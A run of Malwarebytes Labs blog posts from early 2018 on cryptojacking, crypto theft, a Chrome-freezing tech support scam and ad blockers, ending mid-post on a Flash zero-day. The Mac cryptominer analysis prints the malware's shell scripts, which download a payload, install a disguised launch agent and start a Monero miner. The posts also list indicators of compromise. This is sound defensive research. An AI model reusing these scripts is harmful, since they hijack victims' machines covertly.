A particular group is seizing this opportunity to deliver one of the most lucrative payloads at the moment: drive-by cryptomining for the Monero (XMR) currency. In a campaign we first observed in late January, but which appears to have started at least around November 2017, millions of mobile users (we believe Android devices are targeted) have been redirected to a specifically designed page performing in-browser cryptomining.

In our previous research on drive-by mining, we defined this technique as automated, without user consent, and mostly silent (apart from the noise coming out of the victim’s computer fan when their CPU is clocked at 100 percent). Here, however, visitors are presented with a CAPTCHA to solve in order to prove that they aren’t bots, but rather real humans.

“Your device is showing suspicious surfing behaviour. Please prove that you are human by solving the captcha.”

Until the code (w3FaSO5R) is entered and you press the Continue button, your phone or tablet will be mining Monero at full speed, maxing out the device’s processor.

Redirection mechanism

The discovery came while we were investigating a separate malware campaign dubbed EITest in late January. We were testing various malvertising chains that often lead to tech support scams with an Internet Explorer or Chrome user-agent on Windows. However, when we switched to an Android, we were redirected via a series of hops to that cryptomining page.

It seems odd that a static code (which is also hardcoded in the page’s source) would efficiently validate traffic between human and bot. Similarly, upon clicking the Continue button, users are redirected to the Google home page, another odd choice for having proved you were not a robot.

While Android users may be redirected from regular browsing, we believe that infected apps containing ad modules are loading similar chains leading to this cryptomining page. This is unfortunately common in the Android ecosystem, especially with so-called “free” apps.

It’s possible that this particular campaign is going after low quality traffic—but not necessarily bots —and rather than serving typical ads that might be wasted, they chose to make a profit using a browser-based Monero miner.

We identified several identical domains all using the same CAPTCHA code, and yet having different Coinhive site keys (see our indicators of compromise for the full details). The first one was registered in late November 2017, and new domains have been created since then, always with the same template.

Domain name, registration date

Traffic stats

We believe there are several more domains than just the few that we caught, but even this small subset is enough to give us an idea of the scope behind this campaign. We shared two of the most active sites with ad fraud researcher Dr. Augustine Fou, who ran some stats via the SimilarWeb web analytics service. This confirmed our suspicions that the majority of traffic came via mobile and spiked in January.

We estimate that the traffic combined from the five domains we identified so far equals to about 800,000 visits per day, with an average time of four minutes spent on the mining page. To find out the number of hashes that would be produced, we could take a conservative hash rate of 10 h/s based on a benchmark of ARM processors.

It is difficult to determine how much Monero currency this operation is currently yielding without knowing how many other domains (and therefore total traffic) are out there. Because of the low hash rate and the limited time spent mining, we estimate this scheme is probably only netting a few thousand dollars each month. However, as cryptocurrencies continue to gain value, this amount could easily be multiplied a few times over.


The threat landscape has changed dramatically over the past few months, with many actors jumping on the cryptocurrency bandwagon. Malware-based miners, as well as their web-based counterparts, are booming and offering online criminals new revenue sources.

Forced cryptomining is now also affecting mobile phones and tablets en masse—not only via Trojanized apps, but also via redirects and pop-unders. While these platforms are less powerful than their Desktop counterparts, there is also a greater number of them out there. Similar to what we see with IoT devices, it’s not always the individual specifications, but rather the power of the collective group altogether that matters.

We strongly advise users to run the same security tools they have on their PC on their mobile devices, because unwanted cryptomining is not only a nuisance but can also cause permanent damage.

Malwarebytes mobile users are protected against this threat.

Indicators of compromise


rcyclmnr[].com rcylpd[.]com recycloped[.]com rcyclmnrhgntry[.]com rcyclmnrepv[.]com

Referring websites (please note that they should not be necessarily considered malicious):

panelsave[.]com offerreality[.]com thewise[.]com go.bestmobiworld[.]com questionfly[.]com goldoffer[.]online exdynsrv[.]com thewhizmarketing[.]com laserveradedomaina[.]com thewhizproducts[.]com smartoffer[.]site formulawire[.]com machieved[.]com wtm.monitoringservice[.]co[.]com stonecalcom[.]com nametraff[.]com becanium[.]com afflow.18-plus[.]net serie-vostfr[.]com pertholin[.]com yrdrtzmsmt[.]com[.]com

Conhive site keys:

gufKH0i0u47VVmUMCga8oNnjRKi1EbxL P3IN11cxuF4kf2kviM1a7MntCPu00WTG zEqkQef50Irljpr1X3BqbHdGjMWnNyCd rNYyUQUC5iQLdKafFS9Gi2jTVZKX8Vlq

The post Drive-by cryptomining campaign targets millions of Android users appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bank robbers 2.0: digital thievery and stolen cryptocoins

Malwarebytes - Fri, 02/09/2018 - 19:57

Imagine running down the street (and away from law enforcement) with 2,000 pounds of gold bars. Or 1,450 pounds in $100 bills. With both of these physical currencies amounting to roughly US$64 million, you’d be making quite a steal…if you could get away with it.

That’s exactly what the next generation of thieves—bank robbers 2.0—did in December 2017, when they stole more than $60 million in Bitcoin* from the mining marketplace NiceHash. It turns out stealing Bitcoin is a lot less taxing on the body.

*Disclaimer: I used the value of Bitcoins as they were at the time of the robbery. Current values are volatile and change from minute to minute.

Crime these days has gotten a technical upgrade. By going digital, crooks are better able to pull off high-stakes sting operations, using the anonymity of the Internet as their weapon of choice. And their target? Cryptocurrency.

Old-school bank robbers

The amount of money stolen from NiceHash is comparable to arguably the biggest physical heist to date, the theft of nearly $70 million from a Brazilian bank in 2005. Noted in the Guinness Book of World Records, the robbers managed to get away with 7,716 pounds of 50 Brazilian real notes. There were 25 people involved—including experts in mathematics, engineering, and excavation—who fronted a landscaping company near the bank, dug a 78-meter (256-foot) tunnel underneath it, and broke through 1 meter (about 3.5 feet) of steel-reinforced concrete to enter the bank vault.

The largest bank robbery in the United States, meanwhile, was at the United California Bank in 1972. The details of this bank robbery were described by its mastermind, Amil Dinsio, in the book Inside the Vault. A gang of seven, including an alarm expert, explosives expert, and burglary tool designer, broke into the bank’s safe deposit vault and made off with cash and valuables with an estimated value of $30 million US dollars.

What these robberies have in common is that, in order to pull them off, there were large groups of criminals involved with various special skills. Most of the criminals of these robberies were either caught or betrayed—physical theft leaves physical traces behind. Today’s physical robbers run the risk of getting hurt or hurting others, or leaving behind prints or DNA. And they are often tasked with moving large amounts of money or merchandise without being seen.

Bank robbers 2.0

So here comes the bank robbers 2.0. They don’t have to worry about transporting stolen goods, fleeing the crime scene, digging or blowing things up. They are in no—immediate—physical danger. And if they’re smart enough, they work alone or remain anonymous, even to their accessories. Their digital thievery has been proven successful through several methods used to obfuscate their identity, location, and criminal master plan.

Social engineering

One of the most spectacular digital crimes targeted 100 banks and financial institutions in 30 nations with a months-long prolonged attack in 2013, reportedly netting the criminals involved over $300 million. The group responsible for this used social engineering to install malicious programs on bank employees’ systems.

The robbers were looking for employees responsible for bank transfers or ATM remote control. By doing so, they were able to mimic the actions required to transfer money to accounts they controlled without alerting the bank that anything unusual was going on. For example, they were able to show more money on a balance than was actually in the account. An account with $10,000 could be altered to show $100,000 so that hackers could transfer $90,000 to their own accounts without anyone noticing anything.

The alleged group behind this attack, the Carbanak Group, have not yet been apprehended, and variants of their malware are still active in the wild.

Ponzi schemes

Bitcoin Savings & Trust (BST), a large Bitcoin investment firm that was later proved to be a pyramid scheme, offered 7 percent interest per week to investors who parked their Bitcoins there. When the virtual hedge fund shut down in 2012, most of its investors were not refunded. At the time of its closing, BST was sitting on 500,000 BTC, worth an estimated $5.6 million. Its founder, an e-currency banker who went by the pseudonym pirateat40, only paid back a small sum to some beneficiaries before going into default. It was later learned that he misappropriated nearly $150,000 of his clients’ money on “rent, car-related expenses, utilities, retail purchases, casinos, and meals.”


Even though details are still unclear, the NiceHash hack was reported as a security breach related to the website of the popular mining marketplace. Roughly 4,732 coins were transferred away from internal NiceHash Bitcoin addresses to a single Bitcoin address controlled by an unknown party. The hackers appear to have entered the NiceHash system using the credentials of one of the company’s engineers. As it stands now, it is unknown how they acquired those, although it’s whispered to be an inside job.

Stolen wallet keys

In September 2011, the MtGox hot wallet private keys were stolen in a case of a simple copied wallet.dat file. This gave the hacker access to not only a sizable number of Bitcoins immediately, but also the ability to redirect the incoming trickle of Bitcoins deposited to any of the addresses contained in the file. This went on for a few years until the theft was discovered in 2014. The damages by then were estimated at $450 million. A suspect was arrested in 2017.

Transaction malleability

When a Bitcoin transaction is made, the account sending the money digitally signs the important information, including the amount of Bitcoin being sent, who it’s coming from, and where it’s going. A transaction ID, a unique name for that transaction, is then generated from that information. But some of the data used to generate the transaction ID comes from the unsigned, insecure part of the transaction.As a result, it’s possible to alter the transaction ID without needing the sender’s permission. This vulnerability in the Bitcoin protocol became known as “transaction malleability.”

Transaction malleability was a hot topic in 2014, as researchers saw how easily criminals could exploit it. For example, a thief could claim that his transactions didn’t show up under the expected ID (because he had edited it), and complain that the transaction had failed. The system would then automatically retry, initiating a second transaction and sending out more Bitcoins.

Silk Road 2.0 blamed this bug for the theft of $2.6 million in Bitcoins in 2014, but it was never proven to be true.

Man-in-the-middle (by design)

In 2018, a Tor proxy was found stealing Bitcoin from both ransomware authors and victims alike. A Tor proxy service is a website that allows users to access .onion domains hosted on the Tor network without having to install the Tor browser. As Tor proxy servers have a man-in-the-middle (MitM) function by design, the thieves were able to replace the Bitcoin address that victims were paying ransom to and insert their own. This left the ransomware authors unpaid, which in turn left the victims without their decryption key.


Also known as drive-by mining, cryptojacking is a next-generation, stealthy robbing trick that covers all mining activities completed on third-party systems without the users’ consent. Stealing little amounts from many can amount to large sums. There are so many methods to achieve this that Malwarebytes’ own Jérôme Segura published a whitepaper about it.

Unlike drive-by downloads that push malware, drive-by mining focuses on utilizing the processing power of visitors’ computers to mine cryptocurrency, especially those that were designed to accommodate non-specialized processors. Miners of this kind come to us in advertisements, bundlers, browser extensions, and Trojans. The revenues are hard to guess, but given the number of blocks Malwarebytes records on Coinhive and similar sites daily, criminal profit margins could be potentially record-breaking.

Physical stealing of digital currency

This last one brings us full circle, as someone actually managed to steal Bitcoins the old-fashioned way. In January 2018, three armed men attempted to rob a Bitcoin exchange in Canada, but failed miserably as a hidden employee managed to call the police. However, others have had more success. The Manhattan District attorney is looking for the accomplice of a man that robbed his friend of $1.8 million in Ether at gunpoint. Apparently this “friend” got hold of the physical wallet and forced the victim to surrender the key needed to transfer the cryptocurrency into his own account.


As we can conclude from the examples above, there are many ways for cybercriminals to get rich quick. With a lot less risk of physical harm and even less hard labor, they can score larger amounts for less risk than the old-fashioned bank robbers. The only pitfall to robbing digital currency is how to turn it into fiat money without raising a lot of suspicion or losing a big chunk to launderers.

While the diminished use of violence is reassuring, it’s still beneficial to think about how we can avoid becoming a victim. Much of it has to do with putting too much trust in the wrong people. We are dealing with a very young industry that doesn’t have a lot of established names. So how can you avoid getting hurt by these modern thieves? Here are a few tips:

  • Don’t put all your eggs in one basket.
  • Use common sense when deciding who to do business with. A little background check into the company and its execs never hurt anyone.
  • Don’t put more money into cryptocurrencies than you can spare.
Additional links

The post Bank robbers 2.0: digital thievery and stolen cryptocoins appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Deepfakes forum goes mining with Coinhive

Malwarebytes - Thu, 02/08/2018 - 19:23

You may or may be familiar with the furore over Deepfakes, a relatively new development in pornography involving a tool called FacesApp, which is capable of producing a real porn clip that replaces the original actors’ heads with those of celebrities—or indeed, anyone at all.

Online fakes have been around since the early 2000s or possibly even earlier; alongside those old photos, fakers would also make the odd terrible porno flick. Those movies would quite literally be a static cut out of a celebrity’s head stuck onto the body. Some 20 years later, the tech has caught up, and the web is suddenly dealing with the fallout.

FacesApp allows people to “train” an AI to create a realistic head so the scene is practically indistinguishable from reality. The AI is trained by feeding it images or footage of people; the more data it has to go off, the more realistic everything is.

After a media firestorm, the inevitable has happened. All of the Deepfake subreddits, where the majority of content was being created, have been taken offline after major players such as Twitter and PornHub had already effectively banned Deepfake content from their networks.

The Deepfake tech is available for pretty much anyone to make use of—the only real barrier to entry is having a powerful PC capable of withstanding the intensive training process, which can take hours or days to complete.

Now, if you were a crafty cybercriminal and knew that the main Deepfakes sources were taken offline, with a sizable community of content consumers and creators with heavy-duty PC rigs suddenly set adrift, what would you do?

The answer, of course, is monetize potentially dubious fakes that you didn’t create yourself and hammer visitor’s PCs with mining scripts.

One of the most popular “lifeboat” sites we’ve seen for those unceremoniously dumped from the tender embrace of reddit was being promoted pretty heavily on surviving subreddits:

Click to enlarge

On the surface, it looks like a fairly typical forum, and it’s been getting a fair bit of activity so far. It all looks legit—or at least as legit as can be given the controversial content on offer:

Click to enlarge

A quick check of the source code, while your CPU likely ramps up to 100 percent, would tell a slightly different story:

Click to enlarge

We have some Javascript located at:


Click to enlarge

Sure, you could try to make sense of it as is. Or, you could just unpack it instead and save yourself a headache because that is a large, confusing pile of code. What is it doing?

var Miner=function

…miner…function? Did this site place mining scripts in the background?

Click to enlarge


They sure did, and we block both the mining and the website in question.

Click to enlarge

Coinhive is something we’ve been blocking since October. It allows you to place cryptocurrency mining scripts on your webpage, similar to how regular adverts are placed, except it’ll try to make as much use of your machine as possible to whip up some Monero coins for the site owner. Here’s an example of a site pushing a PC to the limit via mining scripts in the background. Check out the resources being gobbled up on the right-hand side:

Click to enlarge

In an age of people leaving dozens of tabs open and going for dinner, websites running scripts that ramp you up to 100 percent CPU usage and generate a fair bit of heat in the bargain just aren’t my thing. Now that we have DIY fake porn tech which demands high system specs and also has people simultaneously making content as well as downloading it, they’re prime targets for a spot of potentially surreptitious cryptomining taking place behind the scenes.

We’ve seen a few mentions of other Deepfake aficionados complaining about dodgy sites, and we’ll be taking a closer look to see what’s out there. All in all, you’re probably better off steering clear of the whole mess and taking up a less stress-inducing hobby (for you and your computer).

Keep your security tools up to date, make informed decisions about what you want to block, and keep those CPU temperatures down to a minimum!

The post New Deepfakes forum goes mining with Coinhive appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bogus hack apps hack users back for cryptocash

Malwarebytes - Wed, 02/07/2018 - 19:30

Recently, we discovered a gold…er…APK mine of fake hacking apps. The “legitimate” versions of hack apps are intended to hack other apps in order to get something for free. Although it’s unclear what exactly these fake apps claim to hack, the real hack job is done to unsuspecting users.

Search and you will find

Disclaimer:  I, and Malwarebytes, do not recommend the process I’m about to outline below. Be that as it may, I’m also not naïve and know people do this all the time. In order to demonstrate the pitfalls of such an approach, I’ll lay it all out for you.

Say you want a hack for a particular app. Obviously, you aren’t going to find such a hack on Google Play. So you fire up your favorite search engine and type in something like <app name> hack apk. In this example, let’s use Lyft hack apk—Lyft being, of course, the popular on-demand transportation company. There, right at the top of the results, is the link to the hack app you desire. You decide to play it safe and navigate to the source domain rather than the direct link to the hack app. It’s a clean but simply looking website called

Convinced that such a clean-looking site has to be legitimate, you proceed to the Lyft hack app.

Click to view slideshow.

Complete with app screenshots, description of the app (stolen from Google Play), a FAQ, and a How to Install section, it looks promising. There is even a long list of tags so it can be easily searched—which is how you navigated there in the first place. You roll the dice and click Download APK…

A bad roll of the dice

After install, you open the app and get a message that states you need to install one of three apps listed to unlock premium content.

Click to view slideshow.

At this point, I suspect that a seasoned user would conclude that the jig is up and rush to uninstall, but let’s just play this out anyway. The first link for Castle Clash redirects you to the legit Google Play version of the game—okay, easy enough.  The second link for Final Fantasy XV redirects to a broken link—fail. The third and final link for AppMatch Survey redirects to a dreaded, but harmless survey that ends in, once again, installing an app from Google Play.

Besides the failed link, all the redirects equal a small payout to the evil doers if an app is installed. Thus the “run it for 30 seconds” disclaimer pop-up.

After installing said app, and still no hack app and/or premium content, you should be ready to uninstall this bogus hack job. Good luck finding the app’s shortcut icon though, because it doesn’t exist. Luckily, it’s not too hard to find in your apps list.

In reality, I’m a little disappointed and confused that the malware developers didn’t hide their efforts more thoroughly. But hey, it’s good news if you did unsuspectingly install it. Hopefully if you did install, you go through the steps to uninstall in leu of the missing shortcut. However, there is going to be small percentage that don’t bother and forget about its existence—which is exactly what the bad actors are “banking” on. (Pun intended. Wait for it…)

Oh, mine!

So far, the attempts to dupe users seem bush league. Meanwhile, the true malicious intent has been running in the background all along. During the entire process of clicking through redirect links, the user may notice their mobile device being a tad slow. That’s because a bitcoin miner has been running the whole time. Under the Java class com.coinhiveminer.CoinHive is a Monero JavaScript miner. Thus, we classify this bogus hack app as Android/Trojan.CoinMiner.kki.

Just a dish of adware

As if things couldn’t get worse, this fake hack app also comes with adware. Not surprising, as we are seeing a trend of adware being added to various malware variants as way to gain extra revenue. This particular adware serves ad pop-ups, as seen below.

Snake eyes

At the beginning of this blog post, I mentioned that I was not naïve to the fact that people willingly install hack apps. I ask you, dear readers, to not be naïve as well. Trying to find workarounds to get apps for free that are otherwise paid apps on Google Play is a gamble. The odds are against you by going to third-party app stores to install apps for free, or finding hack apps like the one described above.  This roll of the dice ends in snake eyes.

In the scenario above, I’m not sure how anything is being hacked from the aforementioned Lyft Hack app. As a matter of fact, this should be the first clue something is fishy. As with anything in life, use your best judgment when installing apps onto your mobile device. Consequently, installing an app from a shady app store, even if it does look legit, could cost you. Stay safe out there!

The post Bogus hack apps hack users back for cryptocash appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac cryptominer has 23 older variants

Malwarebytes - Wed, 02/07/2018 - 18:35

On February 1, a new Mac cryptominer was discovered being distributed via a hack of the MacUpdate website. Since then, we’ve been doing some digging and found that this isolated incident was just the tip of the iceberg. The malware delivered by the MacUpdate hack appears to be the culmination of something that has been around since at least early October of last year.

As we usually do when looking into new malware, we did some searches through the website VirusTotal—a massive crowd-sourced malware repository —to see if we could find any other variants. These searches, called “retrohunts,” don’t always turn up much, but in this case we struck gold, finding no less than 23 older variants of this malware!

The oldest of these was a file named “” (nice name). Decompressing the file resulted in a folder with two files: an image file called “ass.jpg” and an apparently broken application named “temp.”

As indicated by the Finder, the “temp” application does not work at all, and on inspection, it didn’t even have the right internal structure to be a macOS app.

However, the contents are nonetheless intriguing. They are:

  • an “ass.jpg” image (which you’re really better off not seeing)
  • a file named “” which is a launch agent .plist file
  • an executable named “Dock” (the same name as the Apple process that manages the Dock)
  • a Frameworks folder containing some external framework code that must be needed by the Dock executable

Clearly, this isn’t an app, but some kind of naughtiness is planned.

What about the first ass.jpg file, located outside the bundle? In what I bet is not at all surprising to anyone, it turns out it’s not actually a JPEG file. Instead, it’s a shell script.

nohup mv ~/Downloads/niceass/ ~/Downloads/niceass/.tmp mv ~/Downloads/niceass/.tmp/Apple ~/Library && mkdir -p ~/Library/LaunchAgents && mv ~/Library/Apple/ ~/Library/LaunchAgents && launchctl load -w ~/Library/LaunchAgents/ && rm -rf ~/Downloads/niceass/.tmp && rm ~/Downloads/niceass/ass.jpg && mv ~/Library/Apple/ass.jpg ~/Downloads/niceass && open -a Preview ~/Downloads/niceass/ass.jpg && ~/Library/Apple/Dock -user -xmr & killall Terminal

As we can see, this script assumes it will be run from within the niceass folder, which in turn must be in the Downloads folder. If it’s anywhere else, or if you removed the broken, the malware will fail completely.

The first step is to rename to “.tmp”, which hides it from view thanks to the initial period in the name. (I’m not sure why it wasn’t distributed with this name in the first place, which would have been far less suspicious.) Next, it moves the various components out of the niceass folder and into the desired locations. The launch agent .plist file is installed and loaded.

Next, the script cleans up a bit and replaces the ass.jpg file with the ass.jpg file from inside the Apple folder. That file is then opened in Preview (ow, my eyes!) to cover up the fact that what was opened wasn’t just an image file.

Finally, the malicious Dock process is launched, passing in what appears to be an erroneous email address as the username to log in to Minergate. Dock will then suck up as much CPU time as it can to mine the Monero cryptocurrency. Hold on tight as your MacBook Pro’s fans attempt to propel it into flight!

The interesting thing is how the ass.jpg runs. We’ve covered a number of tricks used by malware in the past to make a shell script look like another type of file, such as a space at the end to prevent the extension from actually being treated as an extension or the use of special non-ASCII lookalike characters in the extension. In this case, though, that’s an honest-to-goodness .jpg extension.

There’s actually a simple way to override this extension. Using the Get Info window (File -> Get Info in the Finder), you can change the application used to open a particular file.

Doing so saves this setting in special metadata associated with the file. If the file is then compressed into a zip file using a Mac, that metadata will be preserved in some special files added to the zip file, and it will be reconstructed on another Mac when decompressed. This metadata can be viewed from the command line using the “xattr -l” command.

$ xattr -l /Users/thomas/Desktop/link-to-download.txt 00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00.......W| 00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b| 00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.| 00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application| 00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term| 00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 || 00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal...| 00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X............| 00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000090 00 00 00 6D |...m|

All in all, this is not a highly sophisticated piece of malware. There are many points of failure and things that will cause suspicion, and these could have all been avoided easily. But hey, this is just the earliest variant. We’ve still got 22 others to look at!

It turns out that none of the other niceass variants are any more sophisticated. Chronologically, the next variant is called “”, and it works similarly, except that the suspicious has been renamed, hiding it from the user’s view. It replaces the nasty photo with a text file containing a serial number of some kind. Otherwise, it is mostly identical, even down to the same damaged email address passed to the miner.

Next came a long string of files claiming to be JPEGs taken from WhatsApp, having names like “WhatsApp Image 2017-12-23 at 13.31.15.jpeg.” These didn’t rely on the, instead downloading the payload from as we saw with the MacUpdate variants, and grabbing a decoy image from

nohup rm -rf ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg && curl -o ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg && open -a Preview ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg && curl -o ~/Library/ && cd ~/Library && unzip ~/Library/ && rm -rf ~/Library/ && mkdir -p ~/Library/LaunchAgents && mv ~/Library/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents && launchctl load -w ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist & killall Terminal

This variant also employs the MacOSupdate.plist and MacOS.plist launch agents as seen with the MacUpdate variants of the malware. These WhatsApp variants are dated between December 23 and January 26 (judging by the file metadata, not the filename).

The final variant, dated December 26, was a single file named link-to-download.txt, which had similarities with both the WhatsApp and serial/niceass variants.

Interestingly, these files are all cryptographically signed using two different Apple developer certificates. These certificates were issued to people named (or claiming to be named) Ramos Jaxson and Tiago Mateus. (Mr. Jaxson was also responsible for the signatures on the more recent MacUpdate variants.)

In an interesting development, reported first by Arnaud Abbati of SentinelOne, the hidden .DS_Store metadata file inside the more recent MacUpdate variants revealed Mr. Mateus’ full name to be Tiago Brandao Mateus.

This is a pretty specific name, but it remains to be seen whether this is his real name or if it’s a decoy. Since this malware is not terribly sophisticated, with some pretty dumb mistakes being made with it, my suspicion is that the hacker who created it had no idea that the .DS_Store file existed, much less that it would capture the username he was using on his computer.

Hopefully, the authorities can track down Mr. Mateus and suss out any involvement he may have had in the creation of this malware.

IOCs Dropped files ~/Library/LaunchAgents/ ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents/MacOS.plist ~/Library/LaunchAgents/MacOSupdate.plist ~/Library/Apple/Dock ~/Library/mdworker/mdworker Hashes 3ec55908c3357b92a58f877440d110a970d4ce4cc76a8ac1a7281abec71c717f d58dd1f057da70a28a67ef48fe4c3942f99ffa082dd7d79c139db7f86e8ac63c b30ef172e01a31c687e311334677241c2b338844a6bc92bfe06bb5f359281dfa 47667ab1c5950b77ed50a7e629dd916db7505bcb9abff6e21dd7edaa280cc043 6b8d88f08569c4ff778647bede9dbb329dad628474422f86cec2ba0c3084072a a6f454b71a4d4f1c9767197f5459363f77fb205ef274a189e4e0aefa825b19f9 ac8f29c762e27d5c6ccb73c016cd05f79123bcf5420e9f7547839243c39d6a4c dd3731d421901f17f213ffd0a38596e12f413d43100be9754879247f51c75397 f23ec1d8de76824838b2ac2782ac97819f94c3a5695e2be83357f5a6e0d12d8c 2527ff0b11fd312c7aa7fc39f19c08298f2a0e17c171f96f83e8a32c4979c878 3dc8fdfb09f38f6ca1ae0360660a9b71e3be58b1ea72655fa07fcc0ed8633e29 eff259d20b01d96b6ae9c05106e6462f5e0dd8ae6dc548f5b9d87444b45988d0 cfa7a04e4958acf89baa0dd2ce2a8b9618fd500f7ed6fffd4cf7703c9bbde188 28219506e683f4324815bcfb4fb9115abfdc611ad49f00d1382ff005f8b10103 cc058cc8821ed92e0c8385a36b4aae589e7383a05eba764195f311c046a519fd 592ba3b270c5f46c2912e64d855f2ff918af4b9708845b5239b83e949d670ba9 a1cdbd2a03bb84f001034ecaed52e45147213e487b2b83df94da42893a2b725f 783ffb8b21e8df463c8f024d4e085aae345ee5784db62c7209f07f30a0fda399 e59c8db1a48b08d03e0c64b9259c11154e267662d5d1183b8dc6837afc33006a 17ff20345c9579ee1f5f51cb5c36806e238536b18db112a99a15b9e0ff190acf 1fc064e7d6624d1539469dc038709fffb7aabc6b484446d7d9dd87507680155f 83f40501e7f27b2b3aa0590b63985b9af99e05dd71f333b2b2d430bd9b4335df f75b21f758b698822518eee358c8b57e9f5421d691d5a9d6fbe395a974c57c3e

The post New Mac cryptominer has 23 older variants appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Safer Internet Day 2018: ad blockers and anti-trackers

Malwarebytes - Tue, 02/06/2018 - 18:00

The path to a safer Internet can be a bit of a quandary. What programs should you buy? How long should your passwords be?  Is it okay to write them down? What makes a website secure?

All of these questions can merit their own lengthy essays, so today, on Safer Internet Day, we’re going to look at some of the simplest solutions for security. What is the easiest, fastest, completely free thing you can do to have a safer Internet experience? The answer: ad blockers and anti-tracking browser extensions. Let’s take a look at how.

Ad blockers

Some people feel that ad blockers are unethical, as they deprive others in the content chain of income. While this can be debated, it’s indisputable that cybercriminals love using ads as a malware delivery mechanism.

Traditionally, bad ads have delivered exploit kits, forced redirects, fake plugin updates, and more.  Recently, malicious ads have been caught running cryptominers, monopolizing your CPU to make the owners a few pennies. Given that you can’t be infected by an ad that doesn’t load, you might want to check out one of the following ad blockers.

Ublock origin (Chrome, Firefox, Safari, Edge)

Is simply blocking most ads not good enough for you? Does the idea of “acceptable ads” seem like a contradiction? Ublock origin might be for you. Most ad blockers are designed for the casual user, eschewing features in favor of keeping a low barrier to entry. Ublock origin is motivated by giving maximum power to the user to determine what content they wish to see, with block granularity down to individual ads on a single site. Ublock used to lose points for being a little tough to get going, but they’ve improved their interface to give a simplified dashboard of the nastiness they’re blocking, as well as a much more defined view if you’re so inclined.

Adblock (Chrome, Firefox, Safari, Edge, Android)

Adblock is one of the earlier blockers out there, and is relatively easy to set and forget. Depending on your block list subscriptions, it may not banish 100 percent of ads from your view, and occasionally struggles with YouTube pre-roll ads.

While its baseline functionality is perfectly serviceable, many privacy advocates take issue with Adblock’s policy on “acceptable ads.” Basically, if your ad meets certain criteria making it less annoying than most, Adblock will let it through. This is something that can be switched off if you’d prefer, but blocking advocates tend to be irritated by the need to go menu diving for what they view as a core function of any blocker—blocking ads.

1blocker (iOS)

Mobile ads, even when not malicious, are some of the worst out there. We’ve observed tech support scams, forced redirects to PUP downloads, and lock screens on the rise for all mobile platforms. 1blocker’s free version will give you back control of what code runs on your iPhone, and in some instances will reduce load on your battery as well.


When you visit a website, part of its content will be delivered by domains separate from the one you actually clicked on. Some of these domains have trackers that send information about your browsing habits to third parties, often for the purpose of serving up ads. Not only can it feel like a violation of privacy, but it can also result in longer load times and wasted bandwidth.

This is a little harder to understand in terms of safety. Aren’t all those people up in arms over privacy concerns being a little paranoid? The threat here is not that Google AdWords is going to take your aggregated data and use it to come club you over the head. A more realistic threat is that AdWords and other poorly vetted (that is to say—all of them) ad networks are accumulating data at a scale that is impossible to moderate, police, or secure.

Given that third parties have had a pretty awful track record at protecting customer data stores at scale, perhaps we should let them have less of it. Anti-tracking browser extensions like Ghostery and the EFF’s Privacy Badger are easy to install, and give you back some measure of control over who is holding onto data about your Internet use.

How do these services keep me safe?

At its core, safety is not a product or service; safety is a collection of behaviors.  While we referred to a handful of products above, they’re really just tools in furtherance of an important behavior—keeping control of what data goes out, and what code goes into your system.

Keeping a vigilant eye on both processes can go a long way towards staying safe online without spending a lot of money. To learn a little more about common online threats, check out our post on bad ads here, and our post on avoiding scams here.

Stay safe, everyone!

The post Safer Internet Day 2018: ad blockers and anti-trackers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tech support scammers find new way to jam Google Chrome

Malwarebytes - Tue, 02/06/2018 - 16:21

During the past quarter we have noted an increase in fake browser alerts pushing tech support scams. Most of these campaigns come from malicious advertising but also via compromised web sites. Crooks are using all sorts of tricks to not only scare users but also to try and ‘lock’ their browsers.

One such technique involving the history.pushState API which we reported about on this blog has now been patched but still continues to be used. There are also the infamous pop-unders that can be used in such a way that users are stuck between various tabs.

In yet another twist, scammers are now abusing another API that achieves their intended goal of freezing the browser. By doing so they hope that users will panic and call the toll-free number for assistance. The following animation shows what a user may experience with Google Chrome’s latest version (64.0.3282.140).

The code responsible for this is embedded within the main page, and slightly obfuscated:

The Blob constructor coupled with the window.navigator.msSaveOrOpenBlob method lets you save files locally and, as you may have guessed, is what is being abused here.

The ch_jam() function calls another function called bomb_ch(), and are both appropriately named for what they do. This in turn calls the download function that uses the aforementioned Blob constructor.

It happens too fast to see how it works, but you may be able to spot it with a powerful enough machine and if you try to close the tab early on. That code triggers a very large number of downloads in rapid fire, which causes the browser to become unresponsive within a few seconds, and unable to be closed via normal means.

The primary targets for this particular browser freeze are Google Chrome users on Windows. Other browsers will get their own landing pages, abusing other HTML APIs. Considering that Chrome has the most market share in the browser category, this is yet another example of the desire for threat actors to deploy new social engineering schemes.

Since most of these browser lockers are distributed via malvertising, an effective mitigation method is to use an ad-blocker. As a last resort, the Windows Task Manager will allow you to forcefully quit the offending browser processes. Malwarebytes users were already protected against the redirection mechanism used in this attack.

The post Tech support scammers find new way to jam Google Chrome appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Flash Player zero-day comes inside Office document

Malwarebytes - Mon, 02/05/2018 - 20:55

A new Flash Player zero-day has been found in recent targeted attacks, as reported by KrCERT. The flaw, which exists in Flash Player and earlier versions, allows an attacker to remotely execute malicious code. On February 1, Adobe published a security advisory acknowledging this zero-day:

